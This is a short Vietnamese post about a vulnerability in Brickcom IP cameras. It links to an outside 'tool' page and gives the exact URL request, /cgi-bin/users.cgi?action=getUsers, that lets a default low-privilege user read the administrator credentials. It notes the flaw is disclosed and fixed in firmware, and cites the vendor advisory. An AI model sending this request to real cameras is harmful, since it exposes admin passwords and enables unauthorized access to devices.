Tool: http://tromcap.com/dvr-exploit-hack-pass-brickcom-ip-camera/

Giới thiệu:
Nhà cung cấp: http://www.brickcom.com

Cách thức:
Lấy thông tin quản trị Admin của IP camera chỉ cần quyền User (dù không được phần quyền cho phép xem và cấu hình) mặc định đi kèm

Url dùng để khai thác: http://<IP>:<PORT>/cgi-bin/users.cgi?action=getUsers

Lỗi đã được công bố và cập nhật firmware để fix lỗi
Chi tiết xem tại : https://www.brickcom.com/news/productCERT_security_advisorie.php

Thanks, Emiliano Ipar